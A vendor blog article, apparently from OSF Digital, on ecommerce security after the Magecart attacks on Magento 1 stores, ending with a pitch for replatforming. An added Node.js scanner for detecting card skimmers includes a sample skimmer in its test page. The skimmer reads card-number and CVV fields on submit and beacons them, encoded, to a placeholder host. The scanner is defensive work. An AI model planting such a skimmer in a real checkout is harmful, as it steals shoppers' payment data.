How to Improve Ecommerce Security after Magento Hack


The recent news of the Magento 1 website hack feels like a punch to the gut. How can cyber attackers wreak so much havoc on your ecommerce business, and what should you do in response to one of the most extensive cybersecurity campaigns in ecommerce history?

Over the last five years, the criminal groups collectively known as Magecart have breached sites and planted malicious JavaScript in stores' source code that logs the payment card details entered at checkout. The problem? Most of the compromised sites ran version 1.x of the Magento online store software, the version that reached end of life on June 30, 2020 and receives no further security updates. For this campaign, which affected roughly 2,000 Magento stores, the absence of critical security patches was exactly the scenario attackers were waiting for.

Magecart has hit hard and often, so much so that both the FBI and Adobe (which owns Magento) issued warnings to store owners who needed to upgrade. Foregenix, a security and compliance firm, analyzed nearly 9 million websites worldwide and found that 87% of websites running Magento were at high risk of attack, compared with 10% of websites on other popular platforms.

4 Ecommerce Security Risks that Test Customer Loyalty and Lose Money

Magento's open-source codebase lets merchants edit the source, offering flexibility and ample customization. However, under Magento's shared responsibility model the merchant is responsible for keeping the site safe, which includes applying security patches as soon as they are released. Here is what you need to know about critical ecommerce security vulnerabilities:

1) Beware of potential server attacks

Whether you host your ecommerce site yourself or through a provider, the server needs protection from Distributed Denial of Service (DDoS) attacks, which deliberately flood it with traffic and disrupt service on your site. DDoS mitigation is normally done upstream of the application, by a CDN, a scrubbing service or the hosting provider, rather than inside the store software. If time is money, then for every minute your site is down, shoppers cannot complete purchases and your business loses revenue.

2) Understand Credit Card Hijacking

Attackers exploit vulnerabilities that let them capture payment data as it passes through your online checkout; this is what made Magecart famous. By injecting malicious JavaScript into the checkout page, or into a third-party script the page loads, they skim card numbers, expiry dates and CVVs in the customer's browser as they are typed and send them to a server the attacker controls. Because the theft happens in the browser before the data is submitted, HTTPS on your site does nothing to stop it. When customer data is stolen, trust is lost, loyalty suffers, and the time and cost of acquiring customers go up.
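To make the skimming pattern concrete, here is an added example (not code from the original article or from Magento) of a small static check that a store operator can run over a saved copy of the checkout page's HTML. It flags external scripts loaded from hosts outside an allowlist, third-party scripts that lack a Subresource Integrity hash, and inline scripts that combine several skimmer indicators (reading payment fields, hooking form submission, and beaconing data out). The checkout HTML, the hostnames `shop.example`, `payments.example` and `cdn-stats.example`, and the allowlist are all constructed for the example.

```javascript
// Added example: static scan of checkout HTML for Magecart-style skimmer indicators.
// Runs under Node.js with no dependencies. All hosts and the sample page are
// constructed placeholders, not real stores or real attacker infrastructure.

const STORE_HOST = "shop.example"; // assumption: the store's own origin
const ALLOWED_SCRIPT_HOSTS = new Set([STORE_HOST, "payments.example"]); // assumption

// Constructed sample checkout page: two legitimate scripts, one innocuous inline
// script, one script from an unknown host, and one inline skimmer.
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<script src="https://shop.example/static/frontend/checkout.js"></script>
<script src="https://payments.example/v3/client.js"
        integrity="sha384-DEADBEEFexampleHashOnlyForIllustration" crossorigin="anonymous"></script>
<script>window.dataLayer = window.dataLayer || []; window.dataLayer.push({event: "checkout"});</script>
<script src="https://cdn-stats.example/stat.js"></script>
<script>
(function(){document.addEventListener('submit',function(){
  var d={n:document.querySelector('#cc_number').value,c:document.querySelector('#cc_cid').value};
  new Image().src='https://cdn-stats.example/i.gif?d='+btoa(JSON.stringify(d));});})();
</script>
</body></html>`;

// Indicators that, in combination, characterise an inline card skimmer.
const SKIMMER_PATTERNS = [
  { name: "reads payment fields", re: /(cc_number|card_number|cc_cid|cvv|expir)/i },
  { name: "hooks form submission", re: /addEventListener\(\s*['"](submit|click|keyup|keydown|change)['"]/ },
  { name: "exfiltrates data", re: /(new Image\(\)|navigator\.sendBeacon|fetch\(|XMLHttpRequest)/ },
  { name: "encodes or obfuscates", re: /(atob\(|btoa\(|unescape\(|fromCharCode|eval\()/ },
];

// Pull one attribute value out of a <script ...> tag's attribute string.
function attr(attrs, name) {
  const m = new RegExp(`(?:^|\\s)${name}\\s*=\\s*["']([^"']*)["']`, "i").exec(attrs);
  return m ? m[1] : null;
}

// Return every <script> element as { src, integrity, body }.
function extractScripts(html) {
  const out = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    out.push({ src: attr(m[1], "src"), integrity: attr(m[1], "integrity"), body: m[2] });
  }
  return out;
}

// Resolve a script src (absolute, protocol-relative or relative) to its hostname.
function hostOf(src) {
  try {
    return new URL(src, `https://${STORE_HOST}/`).hostname;
  } catch {
    return null;
  }
}

// Audit a checkout page and return a list of findings (empty means nothing suspicious).
function auditCheckoutHtml(html) {
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src !== null) {
      const host = hostOf(s.src);
      if (host === null || !ALLOWED_SCRIPT_HOSTS.has(host)) {
        findings.push({ kind: "unexpected-script-host", detail: s.src });
      } else if (host !== STORE_HOST && s.integrity === null) {
        // A trusted third party can itself be compromised; SRI pins the exact file.
        findings.push({ kind: "third-party-script-without-sri", detail: s.src });
      }
    } else {
      const hits = SKIMMER_PATTERNS.filter((p) => p.re.test(s.body)).map((p) => p.name);
      if (hits.length >= 2) {
        findings.push({ kind: "inline-skimmer-indicators", detail: hits.join(", ") });
      }
    }
  }
  return findings;
}

if (typeof require !== "undefined" && require.main === module) {
  for (const f of auditCheckoutHtml(SAMPLE_CHECKOUT_HTML)) {
    console.log(`${f.kind}: ${f.detail}`);
  }
}
```

On the constructed page the scan reports the script from `cdn-stats.example` as an unexpected host and the final inline block as a skimmer (it reads payment fields, hooks `submit`, encodes the data and sends it out through an image request). A check like this belongs in a scheduled job that fetches the live checkout page, because skimmers are typically injected server-side and appear only in the HTML customers actually receive; a Content Security Policy that restricts `script-src` to the allowlisted hosts is the corresponding preventive control.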

3) Monitor for Website Defacement

In fall 2019, Magento issued a security patch for a remote code execution vulnerability; stores that did not apply it stayed open to attackers able to run their own code on the server, which is how homepages get vandalized and files across the site get modified. Defacement damages brand reputation if it is not caught early, and any visible sign of a compromised site will turn customers away before they hand over payment information.

4) Watch for Malicious Botnetting

While it is common to use bots to automate routine tasks, a botnet is a network of compromised machines under someone else's control, and a compromised store server can be drafted into one. When that happens, spam can go out under your brand to millions of recipients, not only breaking trust in your brand but reducing the deliverability of future email once your server's address is blacklisted.

Even though Magento 1 has reached end of life, now is the perfect time to dive deeper into your needs as an ecommerce business and decide what kind of platform would help you grow best. Below are two options to consider at this juncture when looking to increase security, and your customers' trust.

Option 1: Should you Secure a Magento 1 Store or Just Replatform to Magento 2?

Security analysts point out that keeping a site on Magento 1 secure is not a sustainable option because the software is at end of life. Without support from Magento, you would likely need to hire outside help to prevent attacks and to perform routine support and maintenance. Some hosting companies cover platform-level security but may not provide the patches and updates your Magento source code will need.

While the risk is lower if you move from Magento 1 to Magento 2, the move still requires a full migration, comparable to adopting a new ecommerce platform from scratch.

A Magento 2 installation will be easier to keep secure than a Magento 1 store, since Magento provides support, patches and updates. However, your business will still need to manage its own Payment Card Industry Data Security Standard (PCI DSS) compliance and make sure patches and updates are applied routinely. While Magento Commerce itself is PCI compliant as a platform, you, as the merchant making changes to the source code, are responsible for the security of your customized instance of the Magento Commerce app running in the Magento Commerce cloud environment.

In practice, that means your business is responsible for confirming secure configuration and code; managing active monitoring such as penetration testing and vulnerability scans; safeguarding the security of all customizations, extensions, apps and integrations; and controlling all code deployments and security patch applications. Additionally, the more a merchant customizes a store, the more time it will take to install future updates and patches. Also keep PCI compliance in mind: some payment providers have said they will no longer support merchants on Magento 1 and have told them to move to Magento 2.

Read more about Magento support and Magento replatforming services.

Option 2: Would a Switch to a New Ecommerce Platform Be Worth it?

The right ecommerce platform should come with security and anti-fraud controls built in. For example, every session, including administrative login, should be protected by TLS, which provides both encryption and server authentication, and administrative access should require strong, preferably multi-factor, authentication.

Switching from Magento to a new, flexible ecommerce platform would also mean a full replatform. However, migrating to a platform like Salesforce Commerce Cloud reduces security risk and removes the need to apply platform software and security updates yourself, since the vendor patches the platform, defends it against server-level attacks and maintains its PCI compliance. The code you add on top of it (cartridges, integrations and custom storefront JavaScript) remains your responsibility, as does your own PCI scope.

Salesforce Commerce Cloud offers cartridges purpose-built to enforce security and block fraud tactics, each addressing a different aspect, so businesses can compose their own security posture. Salesforce also provides a website with real-time information on system performance and security, giving transparency around its products.

Finally, Salesforce Commerce Cloud replatforming uses clicks, not code, to build ecommerce experiences: an array of templates with flexible customization, plus apps built on commerce APIs, deliver personalized, engaging experiences with user-friendly tools.

However you decide to reduce your ecommerce security risks, it is more vital now than ever to find a scalable platform that protects your brand and gives your customers the best experience possible, and keeps them for life.

OSF Digital provides technology, consulting, implementation, and online shop management services to emerging and premier brands, and to merchants focused on building multi-cloud and unified commerce projects using Salesforce clouds and other top-tier cloud technologies. Discover what you can achieve with our replatforming services.

Like the fine details? Check out Salesforce's security, privacy, and architecture documentation as of September 2020, covering audits, certifications, security policy and procedures, reliability and backup, and disaster recovery protocol, among other topics.
